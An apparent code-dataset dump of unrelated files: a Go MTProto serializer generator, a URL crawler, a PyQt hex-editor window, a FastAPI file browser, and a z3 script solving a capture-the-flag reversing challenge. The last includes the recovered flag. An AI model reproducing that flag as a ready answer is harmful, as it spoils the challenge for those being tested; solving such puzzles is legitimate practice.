                        classTypesTexts += ' if m.' + to_proto_go_name(paramName) + ' != 0 {\n';
                    elif (paramType in ['string']):
                        #print ' if m.' + to_proto_go_name(paramName) + ' != "" {'
                        classTypesTexts += ' if m.' + to_proto_go_name(paramName) + ' != "" {\n';
                    else:
                        #print ' if m.' + to_proto_go_name(paramName) + ' != nil {'
                        classTypesTexts += ' if m.' + to_proto_go_name(paramName) + ' != nil {\n';
                    classTypesTexts += ' flags |= 1<<' + conditions[paramName] + '\n';
                    classTypesTexts += ' }\n';
        if (hasFlags):
            classTypesTexts += ' x.UInt(flags)\n\n'
        # second pass: emit one serializer statement per field, by mapped type
        for paramName in prmsList:
            if (paramName == 'flags'):
                continue;
            paramType = prms[paramName];
            if (paramName in conditionsList):
                classTypesTexts += ' if (flags & (1 << ' + conditions[paramName] + ')) != 0 {\n';
            if (paramType == 'bool'):
                classTypesTexts += ' // ignore\n';
                # classTypesTexts += ' if (flags & (1 << ' + conditions[paramName] + ')) != 0 {\n';
            elif (paramType =='int32'):
                classTypesTexts += ' x.Int(m.' + to_proto_go_name(paramName) + ')\n';
            elif (paramType == 'int64'):
                classTypesTexts += ' x.Long(m.' + to_proto_go_name(paramName) + ')\n';
            elif (paramType == 'double'):
                classTypesTexts += ' x.Double(m.' + to_proto_go_name(paramName) + ')\n';
            elif (paramType == 'string'):
                classTypesTexts += ' x.String(m.' + to_proto_go_name(paramName) + ')\n';
            elif (paramType == 'int128'):
                classTypesTexts += ' x.Bytes(m.' + to_proto_go_name(paramName) + ')\n';
            elif (paramType == 'int256'):
                classTypesTexts += ' x.Bytes(m.' + to_proto_go_name(paramName) + ')\n';
            elif (paramType == 'bytes'):
                classTypesTexts += ' x.StringBytes(m.' + to_proto_go_name(paramName) + ')\n';
            elif (paramType == 'repeated int32'):
                classTypesTexts += ' x.VectorInt(m.' + to_proto_go_name(paramName) + ')\n';
            elif (paramType == 'repeated int64'):
                classTypesTexts += ' x.VectorLong(m.' + to_proto_go_name(paramName) + ')\n';
            elif (paramType == 'repeated string'):
                classTypesTexts += ' x.VectorString(m.' + to_proto_go_name(paramName) + ')\n';
            elif (paramType in TypesList):
                classTypesTexts += ' x.Bytes(m.' + to_proto_go_name(paramName) + '.Encode())\n';
            elif (paramType.find('std::vector') >= 0):
                eptype = txt_wrap_by('<', '*', paramType);
                classTypesTexts += ' // x.VectorMessage(m.' + to_proto_go_name(paramName) + ');\n';
                classTypesTexts += ' // x%d := make([]byte, 8)\n' % (ii)
                classTypesTexts += ' // binary.LittleEndian.PutUint32(x%d, uint32(TLConstructor_CRC32_vector))\n' % (ii)
                classTypesTexts += ' // binary.LittleEndian.PutUint32(x%d[4:], uint32(len(m.%s)))\n' % (ii, to_proto_go_name(paramName))
                classTypesTexts += ' x.Int(int32(len(m.%s)))\n' % (to_proto_go_name(paramName))
                classTypesTexts += ' for _, v := range m.' + to_proto_go_name(paramName) + ' {\n'
                classTypesTexts += ' x.buf = append(x.buf, (*v).Encode()...)\n'
                classTypesTexts += ' }\n'
            elif (paramType.find('TLObjectVector') >= 0):
                eptype = txt_wrap_by('<', '>', paramType);
                classTypesTexts += ' // x.VectorMessage(m.' + to_proto_go_name(paramName) + ');\n';
                classTypesTexts += ' // x%d := make([]byte, 8)\n' % (ii)
                classTypesTexts += ' // binary.LittleEndian.PutUint32(x%d, uint32(TLConstructor_CRC32_vector))\n' % (ii)
                classTypesTexts += ' // binary.LittleEndian.PutUint32(x%d[4:], uint32(len(m.%s)))\n' % (ii, to_proto_go_name(paramName))
                classTypesTexts += ' x.Int(int32(TLConstructor_CRC32_vector))\n'
                classTypesTexts += ' x.Int(int32(len(m.%s)))\n' % (to_proto_go_name(paramName))
                classTypesTexts += ' for _, v := range m.' + to_proto_go_name(paramName) + ' {\n'
                classTypesTexts += ' x.buf = append(x.buf, (*v).Encode()...)\n'
                classTypesTexts += ' }\n'
            else:
                # classTypesTexts += ' // 2. ' + paramType + ' ' + paramName + ' = ' + str(ii) + ';\n';
                classTypesTexts += ' x.Bytes(m.' + to_proto_go_name(paramName) + '.Encode())\n';
            if (paramName in conditionsList):
                classTypesTexts += ' }\n';
            ii += 1;
        classTypesTexts += ' return x.buf\n'
        classTypesTexts += '}\n\n';
        ## Decode()
        # classTypesTexts += 'message Z' + name + ' : public ' + resType + ' {\n'; # type class declaration
        classTypesTexts += 'func (m* TL' + to_proto_go_name(name) + ') Decode(dbuf *DecodeBuf) error {\n'; # type class declaration
        # classTypesTexts += ' x.Int(int32(TLConstructor_CRC32_' + name + '))\n'
        ii = 1;
        if (hasFlags):
            classTypesTexts += ' flags := dbuf.UInt()\n'
            if (name=='messages_channelMessages'):
                # keep the Go compiler happy when flags would otherwise be unused
                classTypesTexts += ' if flags != 0 {}\n'
        for paramName in prmsList:
            if (paramName == 'flags'):
                continue;
            paramType = prms[paramName];
            if (paramName in conditionsList):
                classTypesTexts += ' if (flags & (1 << ' + conditions[paramName] + ')) != 0 {\n';
            if (paramType == 'bool'):
                if (paramName in conditionsList):
                    # classTypesTexts += '';
                    classTypesTexts += ' m.' + to_proto_go_name(paramName) + ' = true\n';
                # classTypesTexts += ' bool ' + paramName + ' = ' + str(ii) + ';\n';
            elif (paramType =='int32'):
                classTypesTexts += ' m.' + to_proto_go_name(paramName) + ' = dbuf.Int()\n';
            elif (paramType == 'int64'):
                classTypesTexts += ' m.' + to_proto_go_name(paramName) + ' = dbuf.Long()\n';
            elif (paramType == 'double'):
                classTypesTexts += ' m.' + to_proto_go_name(paramName) + ' = dbuf.Double()\n';
            elif (paramType == 'int128'):
                classTypesTexts += ' m.' + to_proto_go_name(paramName) + ' = dbuf.Bytes(16)\n';
            elif (paramType == 'int256'):
                classTypesTexts += ' m.' + to_proto_go_name(paramName) + ' = dbuf.Bytes(32)\n';
            elif (paramType == 'string'):
                classTypesTexts += ' m.' + to_proto_go_name(paramName) + ' = dbuf.String()\n';
            elif (paramType == 'bytes'):
                classTypesTexts += ' m.' + to_proto_go_name(paramName) + ' = dbuf.StringBytes()\n';
            elif (paramType == 'repeated int32'):
                classTypesTexts += ' m.' + to_proto_go_name(paramName) + ' = dbuf.VectorInt()\n';
            elif (paramType == 'repeated int64'):
                classTypesTexts += ' m.' + to_proto_go_name(paramName) + ' = dbuf.VectorLong()\n';
            elif (paramType == 'repeated string'):
                classTypesTexts += ' m.' + to_proto_go_name(paramName) + ' = dbuf.VectorString()\n';
            elif (paramType in TypesList):
                classTypesTexts += ' // dbuf.Int()\n'
                classTypesTexts += ' m.' + to_proto_go_name(paramName) + ' = &' + to_proto_go_name(paramType) + '{}\n';
                classTypesTexts += ' (*m.' + to_proto_go_name(paramName) + ').Decode(dbuf)\n';
            elif (paramType.find('std::vector') >= 0):
                eptype = txt_wrap_by('<', '*', paramType);
                classTypesTexts += ' // x.VectorMessage(m.' + to_proto_go_name(paramName) + ');\n';
                classTypesTexts += ' // c%d := dbuf.Int()\n' % (ii)
                classTypesTexts += ' // if c%d != int32(TLConstructor_CRC32_vector) {\n' % (ii)
                classTypesTexts += ' // return fmt.Errorf("Not vector, classID: ", c%d)\n' % (ii)
                classTypesTexts += ' // }\n'
                classTypesTexts += ' l%d := dbuf.Int()\n' % (ii)
                classTypesTexts += ' m.%s = make([]*%s, l%d)\n' % (to_proto_go_name(paramName), to_proto_go_name(eptype), ii)
                classTypesTexts += ' for i := 0; i < int(l%d); i++ {\n' % (ii)
                classTypesTexts += ' m.%s[i] = &%s{}\n' % (to_proto_go_name(paramName), to_proto_go_name(eptype))
                if (eptype in TypesList):
                    classTypesTexts += ' (*m.%s[i]).Decode(dbuf)\n' % (to_proto_go_name(paramName))
                else:
                    classTypesTexts += ' dbuf.Int()\n'
                    classTypesTexts += ' (*m.%s[i]).Decode(dbuf)\n' % (to_proto_go_name(paramName))
                    classTypesTexts += ' // TODO(@benqi): Check classID valid!!!\n'
                    classTypesTexts += ' // dbuf.Int()\n'
                classTypesTexts += ' }\n'
            elif (paramType.find('TLObjectVector') >= 0):
                eptype = txt_wrap_by('<', '>', paramType);
                classTypesTexts += ' // x.VectorMessage(m.' + to_proto_go_name(paramName) + ');\n';
                classTypesTexts += ' // dbuf.Int()\n'
                classTypesTexts += ' c%d := dbuf.Int()\n' % (ii)
                classTypesTexts += ' if c%d != int32(TLConstructor_CRC32_vector) {\n' % (ii)
                classTypesTexts += ' return fmt.Errorf("Not vector, classID: ", c%d)\n' % (ii)
                classTypesTexts += ' }\n'
                classTypesTexts += ' l%d := dbuf.Int()\n' % (ii)
                classTypesTexts += ' m.%s = make([]*%s, l%d)\n' % (to_proto_go_name(paramName), to_proto_go_name(eptype), ii)
                classTypesTexts += ' for i := 0; i < int(l%d); i++ {\n' % (ii)
                classTypesTexts += ' m.%s[i] = &%s{}\n' % (to_proto_go_name(paramName), to_proto_go_name(eptype))
                if (eptype in TypesList):
                    classTypesTexts += ' (*m.%s[i]).Decode(dbuf)\n' % (to_proto_go_name(paramName))
                else:
                    classTypesTexts += ' dbuf.Int()\n'
                    classTypesTexts += ' (*m.%s[i]).Decode(dbuf)\n' % (to_proto_go_name(paramName))
                    classTypesTexts += ' // TODO(@benqi): Check classID valid!!!\n'
                    classTypesTexts += ' // dbuf.Int()\n'
                classTypesTexts += ' }\n'
            else:
                # classTypesTexts += ' // 2. ' + paramType + ' ' + paramName + ' = ' + str(ii) + ';\n';
                classTypesTexts += ' // other!!!! x.Bytes(m.' + to_proto_go_name(paramName) + '.Encode())\n';
            if (paramName in conditionsList):
                classTypesTexts += ' }\n';
            ii += 1;
        classTypesTexts += ' return dbuf.err\n'
        classTypesTexts += '}\n\n';
    # close the three wrapper functions for this boxed type
    resClassTypesTexts += ' }\n'
    resClassTypesTexts += ' return\n'
    resClassTypesTexts += '}\n\n';
    resClassTypesTexts2 += ' }\n'
    resClassTypesTexts2 += ' return dbuf.err\n'
    resClassTypesTexts2 += '}\n\n'
    resClassTypesTexts3 += ' }\n'
    resClassTypesTexts3 += ' return\n'
    resClassTypesTexts3 += '}\n\n'
    resClassTypesTexts = resClassTypesTexts + resClassTypesTexts2 + resClassTypesTexts3
# ---- Emit Go Encode/Decode for every RPC function constructor ----
classTypesTexts += '\n// RPC\n';
for restype in funcsList:
    v = funcsDict[restype];
    for data in v:
        # record layout produced by the parser above
        name = data[0];
        typeid = data[1];
        prmsList = data[2];
        prms = data[3];
        hasFlags = data[4];
        conditionsList = data[5];
        conditions = data[6];
        trivialConditions = data[7];
        line = data[8]
        classTypesTexts += '// ' + line + '\n'; # type class declaration
        classTypesTexts += 'func (m* TL' + to_proto_go_name(name) + ') Encode() []byte {\n'; # type class declaration
        classTypesTexts += ' x := NewEncodeBuf(512)\n'; # type class declaration
        classTypesTexts += ' x.Int(int32(TLConstructor_CRC32_' + name + '))\n'
        ii = 1;
        # first pass: compute the flags bitmask from the conditional fields
        if (hasFlags):
            classTypesTexts += '\n var flags uint32 = 0\n';
            for paramName in prmsList:
                paramType = prms[paramName];
                if (paramName in conditionsList):
                    if (paramType in ['bool']):
                        #print ' if m.' + to_proto_go_name(paramName) + ' == true {'
                        classTypesTexts += ' if m.' + to_proto_go_name(paramName) + ' == true {\n';
                    elif (paramType in ['int32', 'int64']):
                        #print ' if m.' + to_proto_go_name(paramName) + ' != 0 {'
                        classTypesTexts += ' if m.' + to_proto_go_name(paramName) + ' != 0 {\n';
                    elif (paramType in ['string']):
                        #print ' if m.' + to_proto_go_name(paramName) + ' != "" {'
                        classTypesTexts += ' if m.' + to_proto_go_name(paramName) + ' != "" {\n';
                    else:
                        #print ' if m.' + to_proto_go_name(paramName) + ' != nil {'
                        classTypesTexts += ' if m.' + to_proto_go_name(paramName) + ' != nil {\n';
                    classTypesTexts += ' flags |= 1<<' + conditions[paramName] + '\n';
                    classTypesTexts += ' }\n';
        if (hasFlags):
            classTypesTexts += ' x.UInt(flags)\n\n'
        # second pass: emit one serializer statement per field, by mapped type
        for paramName in prmsList:
            if (paramName == 'flags'):
                continue;
            paramType = prms[paramName];
            if (paramName in conditionsList):
                classTypesTexts += ' if (flags & (1 << ' + conditions[paramName] + ')) != 0 {\n';
            if (paramType == 'bool'):
                if (paramName in conditionsList):
                    # classTypesTexts += '';
                    classTypesTexts += ' // m.' + to_proto_go_name(paramName) + ' = true\n';
            elif (paramType =='int32'):
                classTypesTexts += ' x.Int(m.' + to_proto_go_name(paramName) + ')\n';
            elif (paramType == 'int64'):
                classTypesTexts += ' x.Long(m.' + to_proto_go_name(paramName) + ')\n';
            elif (paramType == 'double'):
                classTypesTexts += ' x.Double(m.' + to_proto_go_name(paramName) + ')\n';
            elif (paramType == 'int128'):
                classTypesTexts += ' x.Bytes(m.' + to_proto_go_name(paramName) + ')\n';
            elif (paramType == 'int256'):
                classTypesTexts += ' x.Bytes(m.' + to_proto_go_name(paramName) + ')\n';
            elif (paramType == 'string'):
                classTypesTexts += ' x.String(m.' + to_proto_go_name(paramName) + ')\n';
            elif (paramType == 'bytes'):
                classTypesTexts += ' x.StringBytes(m.' + to_proto_go_name(paramName) + ')\n';
            elif (paramType == 'repeated int32'):
                classTypesTexts += ' x.VectorInt(m.' + to_proto_go_name(paramName) + ')\n';
            elif (paramType == 'repeated int64'):
                classTypesTexts += ' x.VectorLong(m.' + to_proto_go_name(paramName) + ')\n';
            elif (paramType == 'repeated string'):
                classTypesTexts += ' x.VectorString(m.' + to_proto_go_name(paramName) + ')\n';
            elif (paramType in TypesList):
                classTypesTexts += ' x.Bytes(m.' + to_proto_go_name(paramName) + '.Encode())\n';
            else:
                if (paramType == 'TQueryType'):
                    # classTypesTexts += ' bytes ' + paramName + ' = ' + str(ii) + ';\n';
                    classTypesTexts += ' x.Bytes(m.' + to_proto_go_name(paramName) + ')\n';
                elif (paramType.find('std::vector') >= 0):
                    eptype = txt_wrap_by('<', '*', paramType);
                    classTypesTexts += ' // x.VectorMessage(m.' + to_proto_go_name(paramName) + ')\n';
                    classTypesTexts += ' // x%d := make([]byte, 8)\n' % (ii)
                    classTypesTexts += ' // binary.LittleEndian.PutUint32(x%d, uint32(TLConstructor_CRC32_vector))\n' % (ii)
                    classTypesTexts += ' // binary.LittleEndian.PutUint32(x%d[4:], uint32(len(m.%s)))\n' % (ii, to_proto_go_name(paramName))
                    classTypesTexts += ' x.Int(int32(len(m.%s)))\n' % (to_proto_go_name(paramName))
                    classTypesTexts += ' for _, v := range m.' + to_proto_go_name(paramName) + ' {\n'
                    classTypesTexts += ' x.buf = append(x.buf, (*v).Encode()...)\n'
                    classTypesTexts += ' }\n'
                elif (paramType.find('TLObjectVector') >= 0):
                    eptype = txt_wrap_by('<', '>', paramType);
                    classTypesTexts += ' // x.VectorMessage(m.' + to_proto_go_name(paramName) + ')\n';
                    classTypesTexts += ' // x%d := make([]byte, 8)\n' % (ii)
                    classTypesTexts += ' // binary.LittleEndian.PutUint32(x%d, uint32(TLConstructor_CRC32_vector))\n' % (ii)
                    classTypesTexts += ' // binary.LittleEndian.PutUint32(x%d[4:], uint32(len(m.%s)))\n' % (ii, to_proto_go_name(paramName))
                    classTypesTexts += ' x.Int(int32(TLConstructor_CRC32_vector))\n'
                    classTypesTexts += ' x.Int(int32(len(m.%s)))\n' % (to_proto_go_name(paramName))
                    classTypesTexts += ' for _, v := range m.' + to_proto_go_name(paramName) + ' {\n'
                    classTypesTexts += ' x.buf = append(x.buf, (*v).Encode()...)\n'
                    classTypesTexts += ' }\n'
                else:
                    # classTypesTexts += ' // 2. ' + paramType + ' ' + paramName + ' = ' + str(ii) + ';\n';
                    classTypesTexts += ' x.Bytes(m.' + to_proto_go_name(paramName) + '.Encode())\n';
            if (paramName in conditionsList):
                classTypesTexts += ' }\n';
            ii += 1;
        classTypesTexts += ' return x.buf\n'
        classTypesTexts += '}\n\n';
        classTypesTexts += 'func (m* TL' + to_proto_go_name(name) + ') Decode(dbuf *DecodeBuf) error {\n'; # type class declaration
        if (hasFlags):
            classTypesTexts += ' flags := dbuf.UInt()\n'
            if (name=='messages_channelMessages'):
                # keep the Go compiler happy when flags would otherwise be unused
                classTypesTexts += ' if flags != 0 {}\n'
        ii = 1;
        for paramName in prmsList:
            paramType = prms[paramName];
            if (paramName == 'flags'):
                continue;
            if (paramName in conditionsList):
                classTypesTexts += ' if (flags & (1 << ' + conditions[paramName] + ')) != 0 {\n';
            if (paramType == 'bool'):
                if (paramName in conditionsList):
                    # classTypesTexts += '';
                    classTypesTexts += ' m.' + to_proto_go_name(paramName) + ' = true\n';
            elif (paramType =='int32'):
                classTypesTexts += ' m.' + to_proto_go_name(paramName) + ' = dbuf.Int()\n';
            elif (paramType == 'int64'):
                classTypesTexts += ' m.' + to_proto_go_name(paramName) + ' = dbuf.Long() \n';
            elif (paramType == 'double'):
                classTypesTexts += ' m.' + to_proto_go_name(paramName) + ' = dbuf.Double()\n';
            elif (paramType == 'int128'):
                classTypesTexts += ' m.' + to_proto_go_name(paramName) + ' = dbuf.Bytes(16)\n';
            elif (paramType == 'int256'):
                classTypesTexts += ' m.' + to_proto_go_name(paramName) + ' = dbuf.Bytes(32)\n';
            elif (paramType == 'string'):
                classTypesTexts += ' m.' + to_proto_go_name(paramName) + ' = dbuf.String()\n';
            elif (paramType == 'bytes'):
                classTypesTexts += ' m.' + to_proto_go_name(paramName) + ' = dbuf.StringBytes()\n';
            elif (paramType == 'repeated int32'):
                classTypesTexts += ' m.' + to_proto_go_name(paramName) + ' = dbuf.VectorInt()\n';
            elif (paramType == 'repeated int64'):
                classTypesTexts += ' m.' + to_proto_go_name(paramName) + ' = dbuf.VectorLong()\n';
            elif (paramType == 'repeated string'):
                classTypesTexts += ' m.' + to_proto_go_name(paramName) + ' = dbuf.VectorString()\n';
            elif (paramType in TypesList):
                # classTypesTexts += ' // x.Bytes(m.' + to_proto_go_name(paramName) + '.Encode())\n';
                classTypesTexts += ' // dbuf.Int()\n'
                classTypesTexts += ' m.' + to_proto_go_name(paramName) + ' = &' + to_proto_go_name(paramType) + '{}\n';
                classTypesTexts += ' (*m.' + to_proto_go_name(paramName) + ').Decode(dbuf)\n';
            else:
                if (paramType == 'TQueryType'):
                    # classTypesTexts += ' bytes ' + paramName + ' = ' + str(ii) + ';\n';
                    classTypesTexts += ' // TODO(@benqi): 暂时这么做,估计还是使用Any类型比较好\n'
                    classTypesTexts += ' o%d := dbuf.Object()\n' % (ii)
                    classTypesTexts += ' m.' + to_proto_go_name(paramName) + ' = o%d.Encode()\n' % (ii)
                elif (paramType.find('std::vector') >= 0):
                    eptype = txt_wrap_by('<', '*', paramType);
                    classTypesTexts += ' // x.VectorMessage(m.' + to_proto_go_name(paramName) + ')\n';
                    classTypesTexts += ' c%d := dbuf.Int()\n' % (ii)
                    classTypesTexts += ' // if c%d != int32(TLConstructor_CRC32_vector) {\n' % (ii)
                    classTypesTexts += ' // return fmt.Errorf("Not vector, classID: ", c%d)\n' % (ii)
                    classTypesTexts += ' // }\n'
                    classTypesTexts += ' l%d := dbuf.Int()\n' % (ii)
                    classTypesTexts += ' m.%s = make([]*%s, l%d)\n' % (to_proto_go_name(paramName), to_proto_go_name(eptype), ii)
                    classTypesTexts += ' for i := 0; i < int(l%d); i++ {\n' % (ii)
                    classTypesTexts += ' m.%s[i] = &%s{}\n' % (to_proto_go_name(paramName), to_proto_go_name(eptype))
                    if (eptype in TypesList):
                        classTypesTexts += ' (*m.%s[i]).Decode(dbuf)\n' % (to_proto_go_name(paramName))
                    else:
                        classTypesTexts += ' dbuf.Int()\n'
                        classTypesTexts += ' (*m.%s[i]).Decode(dbuf)\n' % (to_proto_go_name(paramName))
                        classTypesTexts += ' // TODO(@benqi): Check classID valid!!!\n'
                        classTypesTexts += ' // dbuf.Int()\n'
                    classTypesTexts += ' }\n'
                elif (paramType.find('TLObjectVector') >= 0):
                    eptype = txt_wrap_by('<', '>', paramType);
                    classTypesTexts += ' // x.VectorMessage(m.' + to_proto_go_name(paramName) + ')\n';
                    classTypesTexts += ' c%d := dbuf.Int()\n' % (ii)
                    classTypesTexts += ' if c%d != int32(TLConstructor_CRC32_vector) {\n' % (ii)
                    classTypesTexts += ' return fmt.Errorf("Not vector, classID: ", c%d)\n' % (ii)
                    classTypesTexts += ' }\n'
                    classTypesTexts += ' l%d := dbuf.Int()\n' % (ii)
                    classTypesTexts += ' m.%s = make([]*%s, l%d)\n' % (to_proto_go_name(paramName), to_proto_go_name(eptype), ii)
                    classTypesTexts += ' for i := 0; i < int(l%d); i++ {\n' % (ii)
                    classTypesTexts += ' m.%s[i] = &%s{}\n' % (to_proto_go_name(paramName), to_proto_go_name(eptype))
                    if (eptype in TypesList):
                        classTypesTexts += ' (*m.%s[i]).Decode(dbuf)\n' % (to_proto_go_name(paramName))
                    else:
                        classTypesTexts += ' dbuf.Int()\n'
                        classTypesTexts += ' (*m.%s[i]).Decode(dbuf)\n' % (to_proto_go_name(paramName))
                        classTypesTexts += ' // TODO(@benqi): Check classID valid!!!\n'
                        classTypesTexts += ' // dbuf.Int()\n'
                    classTypesTexts += ' }\n'
                else:
                    # classTypesTexts += ' // 2. ' + paramType + ' ' + paramName + ' = ' + str(ii) + ';\n';
                    classTypesTexts += ' // other!!!! x.Bytes(m.' + to_proto_go_name(paramName) + '.Encode())\n';
            if (paramName in conditionsList):
                classTypesTexts += ' }\n';
            ii += 1;
        classTypesTexts += ' return dbuf.err\n'
        classTypesTexts += '}\n\n';
# Assemble the complete generated Go source file as one string: a fixed
# Apache-2.0 license header, the `package mtproto` + import preamble, a
# classID -> constructor registry spliced from `registers`, and the
# Encode/Decode method bodies accumulated earlier in `resClassTypesTexts`
# and `classTypesTexts`.  A single line-continued ('\' at EOL) literal is
# used so the '\n' escapes become real newlines in the emitted Go file.
proto_file = '\
/*\n\
* WARNING! All changes made in this file will be lost!\n\
* Created from \'scheme.tl\' by \'codegen_encode_decode.py\'\n\
*\n\
* Copyright (c) 2017, https://github.com/nebulaim\n\
* All rights reserved.\n\
*\n\
* Licensed under the Apache License, Version 2.0 (the "License");\n\
* you may not use this file except in compliance with the License.\n\
* You may obtain a copy of the License at\n\
*\n\
* http://www.apache.org/licenses/LICENSE-2.0\n\
*\n\
* Unless required by applicable law or agreed to in writing, software\n\
* distributed under the License is distributed on an "AS IS" BASIS,\n\
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n\
* See the License for the specific language governing permissions and\n\
* limitations under the License.\n\
*/\n\n\
package mtproto\n\n\
import ( \n\
// "encoding/binary" \n\
"fmt" \n\
"github.com/golang/protobuf/proto"\n\
)\n\n\
type newTLObjectFunc func() TLObject\n\n\
var registers2 = map[int32]newTLObjectFunc {\n\
' + ''.join(registers) + '}\n\n\
func NewTLObjectByClassID(classId int32) TLObject { \n\
m, ok := registers2[classId]\n\
if !ok {\n\
return nil\n\
}\n\
return m()\n\
}\n\n\
//////////////////////////////////////////////////////////////////////////////////////////\n\
' + resClassTypesTexts + '\n\n\
' + classTypesTexts + '\n'
# Write the generated source to `output_proto`, but only when the content
# actually changed, so downstream build tools do not see a spurious
# modification timestamp on every codegen run.
already_header = ''
# BUG FIX: was `os.path.isfile(proto_file)` — proto_file holds the generated
# *content* (a multiline string), not a path; the existence check must be
# done on the output path that is opened below.
if os.path.isfile(output_proto):
    with open(output_proto, 'r') as already:
        already_header = already.read()
if already_header != proto_file:
    with open(output_proto, 'w') as out:
        out.write(proto_file)
|
19,296 | e56074ff66854ef6a2fc691e686a2f2de09a0d5c | '''
Created on 20/11/2015
@author: Joao Pimentel
'''
import requests
from ..utils import progress
from ..database.connection import connect
from ..database.queries import first
from ..database.queries import q_select_void, q_update_void
from ..database.queries import fq_select_resource_cache
from ..database.queries import fq_insert_resource_cache, fq_update_online_void
def void_resources():
    """Return every row produced by the void-resources select query.

    The result is fully materialized into a list before the connection
    context is left, so the cursor is never consumed after close.
    """
    # NOTE(review): `connect` is entered directly (not called) — confirm it
    # is a reusable context manager object rather than a factory function.
    with connect as conn:
        rows = conn.execute(q_select_void)
        return [row for row in rows]
def update_description():
    """Execute the void-description update query and print the row count.

    Prints ``<n> alterados`` (Portuguese: "changed") to stdout.
    """
    # NOTE(review): `connect` is entered directly (not called) — confirm it
    # is a reusable context manager object rather than a factory function.
    with connect as conn:
        changed = list(conn.execute(q_update_void))
        print(len(changed), 'alterados')
def crawler(resources):
    """Fetch each resource's URL, record its online status and cache the body.

    For every resource: issue a GET to ``resource.url``; mark the resource
    online iff the response status is 200, and on success insert the response
    body/content-type/encoding into the resource cache — but only when no
    cache row exists yet for that resource id. Network failures are skipped
    so a single bad URL does not abort the whole crawl.
    """
    for resource in progress(resources):
        try:
            resp = requests.get(resource.url)
        except requests.RequestException:
            # BUG FIX: was a bare `except:`, which also swallowed
            # KeyboardInterrupt/SystemExit and hid programming errors;
            # only network-level failures are expected and skippable here.
            continue
        # NOTE(review): `connect` is entered directly (not called) — confirm
        # it is a reusable context manager rather than a factory function.
        with connect as conn:
            online = resp.status_code == 200
            rupdate = fq_update_online_void(resource.resource_id, online)
            if online:
                rid = resource.resource_id
                rcselect = fq_select_resource_cache(rid)
                # Insert into the cache only once per resource id.
                if not first(conn.execute(rcselect)):
                    rcinsert = fq_insert_resource_cache(
                        rid, resp.content,
                        resp.headers.get('content-type'), resp.encoding)
                    conn.execute(rcinsert)
            conn.execute(rupdate)
        resp.close()
|
19,297 | 3edbdce3f4c7475f55dac39fe37c905baab1ee56 | from z3 import *
s = Solver()

# Unknowns v6..v35: one printable-ASCII code point (32..126) per flag char.
chars = {i: Int('v%d' % i) for i in range(6, 36)}
for v in chars.values():
    s.add(v >= 32, v <= 126)

# The target binary constrains each consecutive triple (a, b, c) of
# unknowns with three linear sums: b+a-c, a-b+c and b-a+c.
SUMS = [
    (81, 53, 87),     # v6,  v7,  v8
    (90, 156, 66),    # v9,  v10, v11
    (98, 140, 92),    # v12, v13, v14
    (38, 170, 60),    # v15, v16, v17
    (29, 161, 69),    # v18, v19, v20
    (163, 27, 69),    # v21, v22, v23
    (147, 43, 59),    # v24, v25, v26
    (146, 86, 44),    # v27, v28, v29
    (67, 89, 75),     # v30, v31, v32
    (117, 125, 125),  # v33, v34, v35
]
for k, (s1, s2, s3) in enumerate(SUMS):
    a = chars[6 + 3 * k]
    b = chars[6 + 3 * k + 1]
    c = chars[6 + 3 * k + 2]
    s.add(b + a - c == s1)
    s.add(a - b + c == s2)
    s.add(b - a + c == s3)

if s.check() == sat:
    # BUG FIX: was Python 2 `print s.model()` — a SyntaxError on Python 3.
    print(s.model())  # reorder it then decimal->hex->string
# Ordered = [67,84,70,123,78,111,119,95,116,104,49,115,95,49,115,95,116,48,95,103,51,116,95,65,78,71,82,121,121,125]
# CTF{Now_th1s_1s_t0_g3t_ANGRyy}
|
19,298 | 61e1dae5beac080dbb188db0d36add55da869b82 |
from PyQt5.QtWidgets import QMdiArea,QMdiSubWindow
from PyQt5.QtCore import Qt
from hexEdit import HexEdit
class MdiArea(QMdiArea):
    """MDI container that can spawn hex-editor subwindows on demand."""

    def __init__(self):
        # IDIOM FIX: use cooperative super() instead of the old explicit
        # `QMdiArea.__init__(self)` base-class call.
        super().__init__()

    def createNewSubHex(self, path=None):
        """Open and show a new subwindow hosting a HexEdit.

        `path` is forwarded to HexEdit unchanged (None by default).
        The subwindow deletes itself on close (WA_DeleteOnClose), so
        closed editors do not accumulate inside the MDI area.
        """
        sub = QMdiSubWindow()
        sub.setWidget(HexEdit(path))
        sub.setAttribute(Qt.WA_DeleteOnClose)
        self.addSubWindow(sub)
        sub.show()
19,299 | 5e4e32e893fd65bf28b991a9332a91b766434236 | # -*- coding:utf-8 -*-
from fastapi import APIRouter
from braggy.backend.app import App
from braggy.backend.models import DirList, FilePath
class FileBrowser():
    """HTTP facade over the application's file browser.

    Registers two routes on a FastAPI APIRouter:
      GET  /init     -> listing of the root ("") directory
      POST /list-dir -> listing of the directory given in the request body
    Both respond with a DirList model.
    """

    def __init__(self):
        self.router = APIRouter()
        # NOTE(review): both routes are registered under name="list_dir";
        # confirm reverse lookups (url_for) are not used, as the names collide.
        route_specs = (
            ("/init", self._get_list_dir, ["GET"]),
            ("/list-dir", self._post_list_dir, ["POST"]),
        )
        for path, endpoint, methods in route_specs:
            self.router.add_api_route(
                path,
                endpoint,
                name="list_dir",
                response_model=DirList,
                methods=methods,
            )

    async def _post_list_dir(self, path: FilePath):
        """Return the items of the directory named in the request body."""
        return {"items": App().file_browser.list_dir(path.path)}

    async def _get_list_dir(self):
        """Return the items of the root ("") directory."""
        return {"items": App().file_browser.list_dir("")}
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.